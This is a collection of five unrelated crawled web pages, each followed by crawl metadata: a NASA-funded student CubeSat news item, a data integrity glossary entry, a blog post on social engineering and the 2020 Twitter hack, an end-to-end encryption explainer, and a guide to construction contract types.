NASA Funds Launch of Shoebox-Size Space QubeSat From Berkeley Students (InterestingEngineering) A team at UC Berkeley hopes to launch a quantum CubeSat into space, and they already have NASA’s funding. NASA offered to cover the launch costs — upwards of $300,000 — for the CubeSat Launch Initiative, which was developed to fly small experiments as auxiliary payloads on nominal rocket launches. NOTE: QubeSat is short for quantum CubeSat. The Berkeley team’s satellite will soon test a new kind of gyroscope based on the quantum mechanical interactions that happen in imperfect diamonds. The diamond gyroscope was first invented at Berkeley, in the laboratory of physicist Dmitry Budker, professor of the graduate school. The undergraduate team behind the QubeSat is also part of an undergraduate aerospace club called Space Technologies at Cal (STAC), which has already flown experiments with help from balloons and the International Space Station — magnificent for a group that’s only four years old. Some of the intrepid team’s graduates have moved on to work at world-historical aerospace companies, like Boeing, SpaceX, and several others. “The NASA grant is just for the launch, so we have still got to supply and manufacture the satellite ourselves,” said Köttering, a junior and majoring in applied mathematics and physics.The UC Berkeley team is now trying to raise $15,000 via crowdfunding, and also campus’ Big Give campaign, and is looking for donated equipment from several manufacturers. The team has already received a $4,950 grant from the UC Berkeley Student Technology Fund.
<urn:uuid:ef454dc1-4b15-4a1b-bebb-4d6d970d0d0e>
CC-MAIN-2024-38
https://www.insidequantumtechnology.com/news-archive/nasa-funds-launch-of-shoebox-size-space-satellite-from-berkeley-students/
2024-09-09T15:25:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00076.warc.gz
en
0.959023
339
2.578125
3
- Bring your own device - Copy protection - Data access control - Data at rest - Data in transit - Data in use - Data leakage - Data loss prevention - Data security - Data security posture management - Data security breach - Data theft - File security - Incident response - Indicators of compromise - Insider threat - Ransomware attack - USB blocker - USB drop attack What is data integrity? Data integrity refers to the stringent set of security standards and processes established to ensure the accuracy and consistency of the data that lives within an organization. Since most decisions made within an organization are data-driven in nature, it's vital to ensure the overall quality of business-critical information throughout its life cycle. Why is data integrity important? Data integrity works in tandem with establishing data security and confidentiality. When the integrity of the data stored within your repositories is established, it can yield the following benefits: - Quick and confident decision-making processes. - Comprehensive audit trails that help forensic analysis. - Compliance with multiple data regulatory standards. - Accuracy in data-driven analysis Data integrity risks There are multiple security issues instigated by internal and external factors that could threaten the overall integrity of the stored data. Here are a few examples: Malicious insider actions Disgruntled employees can undermine your organization's security and sabotage the integrity of stored data. Mistakes by negligent employees When careless users do not meet appropriate protocols and standards of data storage and processing, it could compromise data integrity. Malware and spyware infections Upon intrusion, malicious software and applications alter and steal data within your network. When a server or computer that holds data crashes or malfunctions, it could jeopardize the integrity of the stored data. How to ensure data integrity Follow the below mentioned best practices to establish and maintain data integrity: - Back up essential information to avoid data loss, and always store a copy of untampered data. - Implement the principle of least privilege to establish access control measures that limit access to data only to authorized users. - Track all file and folder activities in real-time across various data repositories using file server auditing software. - Assess various risks to data, and scan for insider threats, presence of orphaned data, and permission hygiene issues. - Establish data lineage by tracking its movement from origin to destruction and ensuring its integrity at each level.
<urn:uuid:c1c4be70-e272-47fd-b6d7-4f46acd7dac6>
CC-MAIN-2024-38
https://www.manageengine.com/in/data-security/what-is/data-integrity.html?source=data-in-use
2024-09-10T17:03:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00876.warc.gz
en
0.890113
506
3.484375
3
Thought leadership. Threat analysis. Cybersecurity news and alerts. 6/18/2023 IntroductionSocial Engineering: The Invisible ThreatIn our digitized world, the threat landscape has vastly expanded. One term has steadily risen to prominence among the spectrum of online perils: Social Engineering. Unlike the conventional image of a hacker aggressively typing away on a keyboard to crack sophisticated codes, social engineering paints a subtler and arguably more sinister picture. This threat is not purely about computers or technology - it's about manipulating human psychology. Social engineering is a form of deception where tricksters manipulate individuals into revealing sensitive information, such as passwords, bank details, or even company secrets. It is an art of exploiting human weaknesses, whether that's trust, curiosity, fear, or simple ignorance. We live in an era where our data is a coveted treasure, and protecting it has become paramount. Guarding Our Digital SelvesWhy should we care? Simply put, no one is immune. Cybercriminals armed with social engineering tactics can strike anyone: from individual internet users to small businesses and multinational corporations. These digital rogues don't discriminate. Their damage can range from mild inconvenience to catastrophic financial and reputation losses. Moreover, the digital and real worlds are no longer separate entities - they are intrinsically intertwined. Our digital persona often holds just as much, if not more, significance as our physical one. Our social profiles, online banking, digital communications, and even our smart appliances at home - all weave into the fabric of our digital identity. Hence, it's not just about protecting our devices but also our digital lives. In the face of this ever-evolving threat, knowledge is our best defence. Understanding the tactics of social engineers and adopting appropriate protective measures can greatly reduce our susceptibility to these attacks. The first step? Equipping yourself with the necessary armour to guard against the wiles of social engineering. Read on to navigate your way through this digital battlefield. Understanding Social EngineeringThe Deceptive ArtImagine this: a stranger converses with you, perhaps at a coffee shop. They charm you, win your trust, and subtly, almost imperceptibly, you find yourself revealing personal information. This is an instance of social engineering in the real world. Translate this scenario into the digital landscape, and you have a typical social engineering attack blueprint. In essence, social engineering is a form of manipulation that exploits human psychology to extract confidential information. Social engineers, the architects of these attacks, can use advanced technical skills. Instead, they leverage an intricate understanding of human behaviour to trick individuals into revealing their passwords, credit card numbers, or other sensitive information. It's less about cracking codes and more about cracking minds. Tools of the TradeWhile the art of social engineering may be complex, social engineers' tactics can be broken down into recognizable patterns. Here are a few common techniques: Social Engineering In ActionTo understand the true power of social engineering, let's examine a couple of real-world incidents: As we delve deeper into how to protect ourselves from social engineering, remember awareness is half the battle. By understanding these tactics, we can be better prepared to spot and avoid social engineering attempts. The Human Element of Social EngineeringTugging the Psychological StringsSocial engineering, at its core, is a psychological play. It preys on the elements that make us human—our emotions, social patterns, and inherent trust in certain institutions. It's an uncomfortable truth, but the soft spot in most security systems is not a glitch in the software but the people using it. Social engineers understand this and leverage human behaviour to circumnavigate digital walls. But how exactly do they do this? Exploiting TrustTrust is a fundamental aspect of human relationships and interactions. We trust our friends, and our family, and we extend this trust to institutions like our banks or service providers. Social engineers exploit this innate trust. For example, in a phishing attempt, they might pose as your bank, sending you an email that looks authentic, and because you trust your bank, you're more likely to engage with the email without questioning its validity. Leveraging AuthorityHumans are hardwired to respect authority, which can be exploited in social engineering attacks. An attacker might impersonate a figure of authority, such as a CEO, a police officer, or a government official, to create a sense of urgency or fear, compelling the victim to divulge information without proper verification. This tactic is commonly seen in CEO fraud attacks or tech support scams. Playing on Fear and UrgencyFear is a powerful motivator, and in a state of panic, people often act without thinking clearly. Social engineers use this to their advantage, instilling fear or creating a sense of urgency to push individuals into hasty actions. For example, they might send an email warning that your bank account is under threat and you need to immediately log in to secure it, thereby luring you to a fake login page. Appealing to Curiosity or GreedSocial engineers also tap into human emotions like curiosity or greed. They may use clickbait titles, promising sensational news or offer too-good-to-be-true rewards, leading the user down a dangerous path. Understanding these psychological tactics is crucial. As we become more aware of how social engineers manipulate our emotions and responses, we're better equipped to guard ourselves against these deceptive strategies. The key lies in balancing healthy skepticism and beneficial online interactions. Remember, in the realm of social engineering, if something feels off, it probably is. Recognizing Social Engineering AttacksUnmasking the Digital DeceptionWhile social engineers employ a vast array of tactics to deceive their victims, the good news is that many of these attacks can be identified with a vigilant eye and a skeptical mindset. Let's break down how to spot the common forms of social engineering attacks: Phishing Emails and Malicious LinksPhishing emails and malicious links form the backbone of many social engineering attacks. Here are some red flags to look out for: Recognizing Requests for Sensitive InformationAny unsolicited request for sensitive information, such as your password, social security number, or bank details, should raise an immediate red flag. Legitimate organizations typically do not ask for this information via email or phone. Spotting Impersonation AttacksImpersonation attacks can happen in both the digital and physical worlds. Digitally, attackers might mimic the email style of a colleague or the format of an email from a trusted organization. In the physical world, they might pose as a maintenance worker or a fellow employee. To counteract this: In the face of social engineering, maintaining a sense of healthy skepticism is your best defence. The adage "think before you click" is especially relevant here. If something feels off, take a moment to question it before proceeding. Protecting Yourself OnlineBuilding a Robust Digital FortressBeing aware of the threats posed by social engineering is half the battle; the other half is building your defences. Online security may seem daunting, but you can significantly bolster it by adopting some straightforward practices. Here are some key steps to enhance your online protection: The Power of PasswordsYour passwords are the keys to your digital kingdom, and it's essential they're both strong and unique. Aim for a mix of letters, numbers, and symbols, and avoid obvious choices like 'password123' or 'admin'. Additionally, ensure that each of your online accounts has a unique password; this way, if one account is compromised, the others remain safe. Password managers can be handy tools to help manage this complexity. Two-Factor Authentication: Your Digital BodyguardTwo-factor authentication (2FA) is like a second layer of security for your accounts. It requires you to provide two forms of identification before you can access your account. This is typically something you know (like your password) and something you have (like a code sent to your phone). With 2FA, even if a hacker manages to get your password, they still will need a second form of identification to access your account. Safe Browsing: Navigating the Digital Seas SafelyAlways check the URL of a website before entering any personal information. A secure site's URL should start with 'https://'—the 's' stands for 'secure'. Be cautious when downloading files or clicking links, especially from unknown sources. VPNs and Secure Networks: The Invisible CloakVirtual Private Networks (VPNs) can provide an extra layer of security by masking your IP address and encrypting your online traffic. This is especially useful when using public Wi-Fi networks, which often need to be more secure. Always try to use trusted and secure networks for sensitive online activities. Regular Software Updates: The Evolving ShieldSoftware updates often include security enhancements and patches for known vulnerabilities. Regularly updating your operating system, apps, and security software is crucial to protecting your devices against the latest threats. In the fight against social engineering, the key to your online security is in your hands. It's not about being completely impervious to attacks. Rather, it's about making it so difficult for social engineers to breach your defences that they choose to move on to an easier target. Responding to Social Engineering AttacksAction Plan for the UnthinkableDespite our best efforts, there may come a time when you find yourself a target or even a victim of a social engineering attack. The initial shock can be disorienting, but responding quickly and methodically is crucial. Here's what you should do: Steps to Take if You've Been Targeted or Victimized The Importance of Reporting AttacksEven if you manage to fend off an attack, it's important to report it. If applicable, social engineering attacks should be reported to your organization's IT or security department and local law enforcement agencies. By reporting the attack, you're not only helping to catch the perpetrators possibly but also helping to improve awareness and prevention measures for these types of crimes. In the world of cybersecurity, shared knowledge is our best defence. Remember, it's not a failure if you fall prey to a social engineering attack. These attackers are skilled manipulators who exploit trust and sociability, inherently human traits. However, taking swift and decisive action can limit the damage and help prevent future attacks. The Role of Continuous LearningStaying One Step Ahead in the Cybersecurity RaceIn the ever-changing cybersecurity landscape, standing still is the same as falling behind. Social engineering is a dynamic threat, with attackers constantly refining their methods and devising new ways to trick unsuspecting individuals. Staying ahead of these threats requires constant learning and adaptation. The Ever-Evolving Nature of Social EngineeringSocial engineering isn't a static field; the tactics that were popular five years ago may differ from those most commonly used today. As our digital behaviours evolve and new technologies emerge, so too do the methods employed by social engineers. For example, as more people become aware of email phishing, social engineers have moved towards more sophisticated techniques like spear-phishing (targeted attacks) or whaling (attacks targeting high-level executives). As the world continues to digitalize, the attack surface expands, creating newer, more creative attacks. The Importance of Staying InformedGiven this rapid pace of change, it's crucial to stay informed about the latest developments in social engineering attacks and the protective measures to counter them. Subscribe to cybersecurity blogs or newsletters, attend relevant webinars, and participate in online cybersecurity communities. Many of these resources are freely available and can provide valuable insights. Make it a point to regularly update your knowledge about the latest scams, tricks, and attack vectors used by social engineers. Equally important is to keep abreast with the advancements in protective measures—be it the latest in two-factor authentication, VPN technologies, or privacy-enhancing software. Regular cybersecurity training is a valuable investment for organizations. It can update employees on the latest threats and reinforce the importance of adhering to security protocols. Remember, the human element is often the weakest link in a security chain, and continuous learning can turn that weakness into a strength. In conclusion, dealing with social engineering is not a one-time task but an ongoing commitment. The digital landscape changes rapidly, and so do the threats we face. However, by committing to continuous learning, we can ensure we're always one step ahead of the attackers, ready to counter whatever new trick they throw our way. Twitter Attributes Latest Hack to Its Systems to Social EngineeringLast July 15th, verified Twitter accounts, including that of Amazon CEO Jeff Bezos and Former U.S. President Barack Obama, tweeted similar content, saying that they've decided to give back to their community by giving back twice the Bitcoin amount (limited to US $50 million) for every Bitcoin that will be sent to a particular Bitcoin address. The tweets were later removed – a confirmation that the tweets were part of a scam and that the involved verified Twitter accounts were, in fact, hacked. A total of 393 transactions sent varying amounts of Bitcoin to the indicated Bitcoin address. Whoever orchestrated the campaign earned 12.8 Bitcoins, valued at US $117,473 as of July 18, 2020. How Twitter Was Hacked?In a blog post dated July 18, 2020, Twitter attributed the hacking of the 130 verified Twitter accounts to social engineering. "At this time, we believe attackers targeted certain Twitter employees through a social engineering scheme," Twitter said. The company, however, didn't elaborate how the social engineering was carried out by attackers. Twitter defined social engineering as the "intentional manipulation of people into performing certain actions and divulging confidential information." According to Twitter, the intentional manipulation of a small number of Twitter employees enabled the attackers to access the company's internal systems using the credentials of the targeted Twitter employees, and "getting through" the company's two-factor authentication (2FA) protection. Twitter said the attackers were able to view personal information including phone numbers and email addresses – information that were accessible to some of the targeted employees. Out of the 130 hacked verified accounts, Twitter added, 45 of those accounts, the attackers were able to login to the account, send tweets and initiate a password reset. In accounts taken over by the attackers, the company said that the attackers may have been able to view additional information. The company also added that the attackers attempted to sell some of the hacked accounts. SIM SwapThe July 15th cyber incident at Twitter isn't the first hacking incident that the company experienced. Nearly a year ago, the Twitter account of its CEO Jack Dorsey was hacked. After taking over Dorsey's Twitter account @jack, attackers fired off nearly two dozen tweets and retweets. "The phone number associated with the account was compromised due to a security oversight by the mobile provider," Twitter said in a statement. "This allowed an unauthorized person to compose and send tweets via text message from the phone number." The above-mentioned statement from Twitter on how its CEO's account was hacked describes a typical SIM swap attack – a type of cyberattack in which a mobile phone company employee switches a victim’s phone number to a new phone number that's under the attacker’s control. This type of attack is carried out in two ways. One method is by calling a customer help line of the mobile phone company and pretend to be the intended victim. The other method is by paying off phone company employees to do the phone number switches. There have been reports that attackers paid off phone company employees to do the phone number switching for as low as US $100. SIM swap plays a big role in an attack that tries to bypass text message-based 2-factor authentication, an authentication method that requires additional authentication, that is, on top of the usual username and password requirement, a user can only login to an account by providing a one-time code – a code that's sent to the phone number provided by a user. In a SIM swap attack, by changing the target's phone number to the phone number controlled by the attacker, the one-time code is sent to the new phone number controlled by the attacker. In September 2019, the U.S. Federal Bureau of Investigation (FBI) warned its partner organizations about SIM swapping. According to the FBI, between 2018 and 2019, the most common tactic used by attackers in circumventing the 2-factor authentication was through SIM swapping. VPN VulnerabilityIn 2019, a report came out that Twitter left its internal systems exposed to outsiders by failing to apply the latest security update of a particular software. This time, however, bug bounty hunters found the vulnerability and responsively disclosed the vulnerability to Twitter. In a blog post dated September 2, 2019, security researchers at DEVCORE reported that they were able to perform on Twitter's internal systems remote code execution – the ability to access someone else's computing device and make changes to it regardless of where this computing device is geographically located. The researchers said they initially gained access to Twitter's internal system by exploiting an unpatched Pulse Secure VPN used by the company. The security researchers at DEVCORE are the same researchers that discovered the remote code execution vulnerability in Pulse Secure VPN products and reported this vulnerability to the software vendor Pulse Secure. The same researchers also discovered and reported the security vulnerabilities in the VPN products of OpenVPN and Fortinet. "During our research, we found a new attack vector to take over all the clients [computers or software that accesses a service made available by a server]," security researchers at DEVCORE said. "It’s the 'logon script' feature. It appears in almost EVERY SSL VPNs, such as OpenVPN, Fortinet, Pulse Secure… and more. It can execute corresponding scripts to mount the network filesystem or change the routing table once the VPN connection established. Due to this 'hacker-friendly' feature, once we got the admin privilege, we can leverage this feature to infect all the VPN clients!" The researchers also reported that they bypassed the 2-factor authentication as Twitter enabled the Pulse Secure VPN's roaming session feature, which allows a session from multiple IP locations. "Due to this 'convenient' [roaming session] feature, we can just download the session database and forge our cookies to log into their system!" Prior to going public, the security researchers at DEVCORE reported to Twitter their findings via the company's bug bounty program. Social engineering is a significant risk for most organizations and individuals alike. This is why we’ve created a blog post with 52 cybersecurity tips for businesses and individuals to help mitigate key risks. | AuthorSteve E. Driz, I.S.P., ITCP Archives
<urn:uuid:c368d482-9a4c-4d1d-b900-e5af86ab7cf0>
CC-MAIN-2024-38
https://www.drizgroup.com/driz_group_blog/category/social-engineering
2024-09-11T23:48:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00776.warc.gz
en
0.941328
3,759
2.65625
3
End-to-end encryption or E2EE is one of the popular modern encryption methods for securing online communications, such as messaging and email services, by ensuring that messages are only readable by the intended recipient. This article will explore the basics of end-to-end encryption, how it works, and its advantages and disadvantages. End-to-end encryption is a type of encryption protocol that encrypts data at the sender’s endpoint and decrypts it only at the recipient’s endpoint. It ensures that data transmitted between two parties is fully protected from unauthorized access or interception by a third party. This technology is critical for maintaining privacy and preventing data breaches, especially in the age of digital communication. With E2E encryption, individuals can communicate with each other without fear of their messages being intercepted, stolen, or tampered with. This protocol is widely used in messaging apps, email services, and other online communication tools. It’s important to note that end-to-end encryption is not foolproof, and there are still risks associated with data breaches or attacks, but it is an effective tool for keeping sensitive information private and secure. E2EE differs from other types of encryption in terms of who controls the cryptographic keys necessary for encryption and decryption. In other types of encryption, such as symmetric encryption, both the sender and the recipient have access to the same secret key. However, in E2EE, the decryption private key is only available to the recipient, making it much more secure, and the public key, used to encrypt the data, can be freely shared. Another important difference is that E2EE provides end-to-end protection, whereas other types of encryption do not. For example, encryption in transit only protects data while it is being transferred between the sender and the recipient. However, once the data reaches the server, it is decrypted and stored in plaintext, making it vulnerable to attacks. E2E encryption also offers protection against attacks that target the server or the communication channel between the sender and the server. In a server-side attack, an attacker gains access to the server and can access all of the data stored on it. However, with E2EE, even if the attacker gains access to the server, they will not be able to access any of the encrypted data. In summary, E2EE differs from other types of encryption in several ways, including endpoint encryption, key control, end-to-end protection, and protection against attacks on the server and communication channel. End-to-end encryption is widely used in E2E encryption email services to ensure secure communication between users. E2E encryption for businesses utilized to secure their internal communication channels. The protocol works by encrypting data at the sender’s endpoint, which can only be decrypted by the intended recipient. This means that even if the service provider or an attacker intercepts the message, they cannot access the data without the decryption private key. By implementing E2EE and privacy standards, users can be confident that their sensitive information is secure and private, allowing them to communicate freely without fear of interception or surveillance. End-to-end encryption provides a high level of protection against various forms of cyber threats. E2EE ensures that the content of a message is only accessible to the intended recipient, protecting against unauthorized access by third parties, including service providers, cybercriminals, and government agencies. E2E encryption also protects against man-in-the-middle attacks, where an attacker intercepts and alters messages sent between two parties. With E2EE, even if a message is intercepted, the encryption prevents the attacker from reading the contents of the message. Additionally, E2EE protects against data breaches, as the end to end encrypted data is useless to attackers without the decryption keys. End-to-end encryption is not a “silver bullet” that can protect against all types of threats. One important limitation is that it does not protect against malware or other types of attacks on the devices themselves. If one of the devices is compromised, for example, by a hacker who gains access to the device or installs malicious software, the encryption will not be effective in protecting the contents of the communication. Another limitation is that end-to-end encryption does not protect against social engineering attacks or other forms of coercion. If a party is forced or tricked into revealing their encryption keys or providing access to their device, the encryption will not be effective in preventing unauthorized data access. While end-to-end encryption is a powerful tool for protecting privacy and security, it is not a panacea and should be used in conjunction with other security measures to provide comprehensive protection against a range of threats. Data privacy is the reason to focus on solid E2E encryption capabilities. One key advantage is that it provides greater privacy and data security for users by ensuring that only the intended recipient can read the messages. This is because the encryption keys used to encrypt and decrypt the messages are only held by the sender and recipient, and not by any intermediaries such as service providers or government agencies. The E2EE key exchange is considered unbreakable using known algorithms and current computing power. Another advantage is that end-to-end encryption provides protection against data breaches and other forms of cyber-attacks. Because the messages are encrypted at the device level, even if a hacker gains access to the server or network, they will not be able to read the contents of the messages. Finally, end-to-end encryption can also help to protect against censorship and surveillance by governments or other entities. By encrypting the messages, users can ensure that their communications are private and not subject to interception or monitoring by third parties. While end-to-end encryption has numerous advantages, there are also several potential disadvantages that should be considered. One disadvantage is that end-to-end encryption can make it more difficult for law enforcement and other authorities to access communications that may be relevant to criminal investigations or national security concerns. This can create tensions between privacy advocates and law enforcement agencies. Another potential disadvantage is that end-to-end encryption can make it easier for criminals and other malicious actors to communicate without fear of detection or interception. This can enable criminal activity such as terrorism, drug trafficking, and cybercrime, making it harder for law enforcement to track and apprehend suspects. Lastly, end-to-end encryption can also pose challenges for companies and service providers that are required to comply with data retention and disclosure laws. Because the messages are encrypted and inaccessible to anyone except the sender and recipient, service providers may not be able to comply with legal requirements to retain and disclose certain types of communications. Many popular applications and services have adopted E2EE as a standard security measure, including messaging apps like WhatsApp, Signal, and Telegram. These apps use E2EE to ensure that messages and calls are secure and cannot be intercepted by third parties. Other applications that use E2EE include file sharing services like Dropbox and cloud storage services like iCloud. By encrypting data in transit and at rest, these applications protect user data from unauthorized access and cyber attacks. E2EE has become an essential component of modern digital communication, and its widespread adoption is a testament to the importance of data privacy and security in our digital world. End-to-end encryption (E2EE) and encryption in transit are two different approaches to securing data during transmission. Encryption in transit is the process of encrypting data as it moves from one point to another, such as between a user’s device and a server. This kind of encryption protects data from interception by third parties during transmission, for example, the Transport Layer Security (TLS) encryption protocol. E2EE, on the other hand, encrypts data at the source and decrypts it only at the destination, ensuring that the data is protected from unauthorized access during transmission and at rest. While encryption in transit provides a basic level of security, E2EE provides a higher level of protection, ensuring that only the intended recipient can read the messages. Both approaches are important for securing data in transit, and the choice of which to use will depend on the specific needs and requirements of each application or service. End-to-end encryption (E2EE) is important because it ensures that data is kept secure and private during transmission and at rest. By encrypting data at the source and decrypting it only at the destination, E2EE ensures that only the intended recipient can read the messages, preventing unauthorized access or interception by third parties. E2EE is particularly important in today’s digital world, where data breaches and cyber attacks are increasingly common. By using E2EE, users can ensure that their sensitive information, such as financial data, medical records, or personal messages, is kept confidential and secure. Moreover, E2EE can help protect against government surveillance and censorship, ensuring that individuals can communicate freely without fear of interception or monitoring by third parties. In countries with repressive governments, E2EE can provide a lifeline for dissidents, journalists, and other activists who rely on secure communication to carry out their work. Finally, E2EE can also help to build trust between users and service providers by demonstrating a commitment to data privacy and security. By adopting E2EE as a standard security measure, companies and service providers can signal their dedication to protecting user data and preventing unauthorized access or interception. End-to-end encryption (E2EE) supports privacy by ensuring that only the intended recipient can read the messages, preventing unauthorized access or interception by third parties. With E2EE, messages are encrypted at the source and decrypted only at the destination, which means that intermediaries, such as service providers or governments, cannot access the content of the messages. This protects user privacy and prevents sensitive information, such as financial data or personal messages, from being exposed. E2EE also enables individuals to communicate freely and privately without fear of government surveillance or censorship. By providing a higher level of security and privacy for digital communication, E2EE helps to safeguard individual privacy rights in an increasingly digital world. End-to-end encryption (E2EE) backdoors refer to intentional vulnerabilities or weaknesses in E2EE systems that allow third parties to access encrypted data. While backdoors may be designed with good intentions, such as to enable law enforcement agencies to access communications in cases of national security, they pose a significant threat to user privacy and security. Backdoors can be introduced in different ways, such as by designing weak encryption algorithms, storing encryption keys in central databases, or requiring service providers to provide access to encrypted data upon request. However, regardless of how they are implemented, backdoors create a vulnerability that can be exploited by hackers, criminals, or authoritarian governments. Moreover, backdoors undermine the very purpose of E2EE, which is to provide a higher level of security and privacy for digital communication. By introducing backdoors, E2EE systems become no different from traditional encryption systems, which are susceptible to interception or unauthorized access. Backdoors have become a contentious issue in the tech industry, with many companies and service providers opposing them on the grounds of user privacy and security. However, some governments argue that backdoors are necessary to combat terrorism, child exploitation, or other criminal activities. End-to-end encryption backdoors are intentional vulnerabilities or weaknesses in E2EE systems that allow third parties to access encrypted data. While they may be designed with good intentions, they pose a significant threat to user privacy and security, and undermine the purpose of E2EE. As the debate over backdoors continues, it remains to be seen whether governments and tech companies can find a compromise that balances national security and user privacy. End-to-end encryption (E2EE) is an important tool for protecting data online. With E2EE, data is encrypted on a user’s device and can only be decrypted by the intended message recipient, ensuring that it is kept private and secure. While E2EE has some limitations and risks, it is still an essential tool for anyone who wants to protect their data. As more and more applications and services adopt E2EE, it’s easier than ever to communicate and share information securely. Helenix could help you implement E2EE in your digital environment. Learn more about our competencies at the Custom Development section. End-to-end encryption is used in messaging services, email services, and cloud storage. The most popular examples of end-to-end encryption is the messaging app, Signal. Signal is a secure E2EE messaging app that offers end-to-end encryption for all messages sent through the app. E2EE ensures that only the intended recipient can read the encrypted message. This is important for sensitive or confidential communications, such as those related to business, finance, or personal matters. End-to-end encryption also provides an added layer of security against hackers and cybercriminals, who may try to intercept or eavesdrop on communications. End-to-end encryption can be hacked in a number of ways, including by exploiting vulnerabilities in the encryption protocol, by using social engineering tactics to gain access to encryption keys, or by intercepting messages before they are encrypted. End-to-end encryption on a phone refers to the use of encryption protocols to secure communications sent and received on a mobile device. This can include messages, emails, phone calls, and other types of communications.
<urn:uuid:cbc9adf5-7866-451d-b0f6-c7a748dc7952>
CC-MAIN-2024-38
https://helenix.com/blog/end-to-end-encryption-ee2e/
2024-09-13T05:57:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.942366
2,759
3.65625
4
Guide to Understanding Construction Contract Types Construction projects are complex endeavors that require careful planning, management and execution. At the heart of every construction project lies the contractual agreement that defines the scope, responsibilities and financial arrangements. Understanding different types of construction contracts is crucial for all stakeholders involved, including project owners, construction contractors and project managers. In this article, we will delve into the common types of construction contracts, their advantages, disadvantages and scenarios in which they are most suitable. What are Construction Contracts? Construction contracts are legally binding agreements that outline the terms, conditions, responsibilities and obligations between parties involved in a construction project. These contracts establish the framework for how a construction project will be planned, executed and completed. They are crucial for providing clarity and legal protection for all parties, including owners, contractors, subcontractors, architects, engineers and suppliers. Common Elements of Construction Contracts Common elements of construction contracts include: - Parties involved: This section identifies the parties entering into the contract, such as the owner (client), contractor, subcontractors, architects, engineers and any other relevant stakeholders. - Scope of work: This outlines the specific tasks, responsibilities and deliverables associated with the project. It details the work to be completed, materials to be used and quality standards to be met. - Project timeline: The contract specifies the start and completion dates of the project, including any milestones or critical dates that need to be met. - Budget and payment terms: This section outlines the financial aspects of the contract, including the total project cost, payment schedule and any provisions for change orders or additional costs. - Contract price and payment terms: The contract should clearly state the agreed-upon price for the project, as well as the payment schedule, which may be based on specific milestones or stages of completion. - Contractual documents: These include any plans, specifications, drawings or other documents that are incorporated into the contract by reference. These documents provide a detailed description of the project requirements. - Insurance and liability: The contract may specify the types and amounts of insurance coverage required by each party, as well as the allocation of liability in case of accidents, damages or delays. - Change orders: This section outlines the process for making changes to the original scope of work, including how additional costs or time extensions will be handled. - Dispute resolution: Contracts often include clauses outlining procedures for resolving disputes, such as mediation, arbitration or litigation. - Termination and default: This section defines the conditions under which the contract can be terminated, as well as the consequences of defaulting on the contract terms. - Warranties and guarantees: The contract may specify any warranties or guarantees provided by the contractor for the completed work. - Regulatory compliance: The contract should include provisions ensuring that all work will be performed in compliance with local, state and federal laws, codes and regulations. Different Types of Construction Contracts Construction contracts provide distinct frameworks for managing responsibilities, costs and risks among the project owner and stakeholders. The type of project typically helps decide which contract to use. Let's dive into the common construction contract types. Lump Sum Contract Lump Sum construction contracts, or Fixed-price contracts, establish a predetermined price for the entire project. This type of contract provides a clear-cut budget from the outset and is one of the most common types of contracts to use. There is a wide range of projects that use lump sum contracts, including residential construction and commercial buildings. Advantages of Lump Sum Contracts - Cost predictability for the client: The client knows the exact cost of the project upfront, which helps with financial planning. - Reduced financial risk for the client: With the exception of change orders, any unforeseen expenses or cost overruns are the contractor's responsibility. Disadvantages of Lump Sum Contracts - Limited flexibility for changes: Since the contract specifies a fixed price for the entire project, any deviations will have to be updated through change orders. - Potential for disputes over scope changes: Disagreements can arise if changes to the original scope are not clearly defined, requiring change orders. Unit Price Contract Unit Price contracts establish fixed rates for specific units of work, such as per square foot or per unit. This type of contract is commonly used for repetitive or standardized work, such as utility installations and Department of Transportation (DOT) work. Advantages of Unit Price Contracts - Suitable for repetitive or standardized work: Provides a standardized pricing model. - Clear pricing for specific units of work: Simplifies cost calculations. Disadvantage of Unit Price Contracts - Potential disputes for the amount of work completed: Owner/client may not want to pay you for the total work completed to date. Cost-plus contracts allow for more flexibility in terms of changes to the project scope. In this type of contract, the client covers the actual construction costs (time and materials contracts) plus an agreed-upon fee/markup for the contractor's services. Common projects that use this type of contract include renovation projects and projects with evolving scope. Advantages of Cost-Plus Contracts - Flexibility for changes and unforeseen circumstances: Well-suited for projects with evolving scopes or uncertain conditions. - Greater transparency in project costs: Clients have insight into all project expenses. Disadvantages of Cost-Plus Contracts - Potential for higher overall project cost: If the project scope expands, the client bears the additional costs. - Requires trust in the contractor: Reliance on the contractor's honesty and integrity regarding cost reporting. Guaranteed Maximum Price (GMP) Contract A GMP contract (Cost Plus Not to Exceed) is a type of construction contract where the contractor agrees to complete a project within a specified budget, which is the maximum price. These projects typically have a well-defined scope and do not have unexpected costs. If the actual costs of construction are lower than the maximum price, the savings may be shared between the owner and the contractor. A Guaranteed Maximum Price contract is typically used when the owner has a strict budget, if the funding is limited or any cost overruns could jeopardize the project. Advantages of a GMP Contract - Provides cost predictability and safeguards for the owner. - Encourages contractors to control costs and manage efficiently. - Allows for cost savings to be shared between the owner and contractor if the project comes in under budget. Disadvantage of a GMP Contract - Potential disputes if unforeseen circumstances arise requiring a change in scope and the not-to-exceed price. Design-build contracts combine both the design and construction phases under a single contract. This approach promotes efficiency and collaboration. Common projects that use this type of contract include infrastructure projects, large-scale developments and higher education schools/campuses. Advantages of Design-Build Contracts - Single point of responsibility for both design and construction: Streamlines communication and accountability. - Faster project delivery: Eliminates potential delays associated with separate design and construction phases. Disadvantages of Design-Build Contracts - Limited control for the client in the design phase: Clients may have less influence over design decisions. - Potential for conflicts between design and construction teams: Requires strong project management and coordination. HOW DELTEK SUPPORTS THE CONSTRUCTION INDUSTRY Deltek ComputerEase is the leading construction software provider of job costing accounting, project management, and payroll services—delivering solutions that help customers connect and automate the project lifecycle that fuels their business. Deltek ComputerEase’s specialized work in progress reporting helps contractors track progress on every job. If you are currently using a generic accounting solution that’s built for standard accounting processes, you will undoubtedly benefit from switching to Deltek ComputerEase, a dedicated construction accounting solution that includes WIP reporting. Contact us today to learn how Deltek ComputerEase can help you to boost your profitability.
<urn:uuid:266ee337-aa63-4b91-b618-faf8ffe01267>
CC-MAIN-2024-38
https://www.deltek.com/en/construction/contract-types
2024-09-13T05:15:56Z
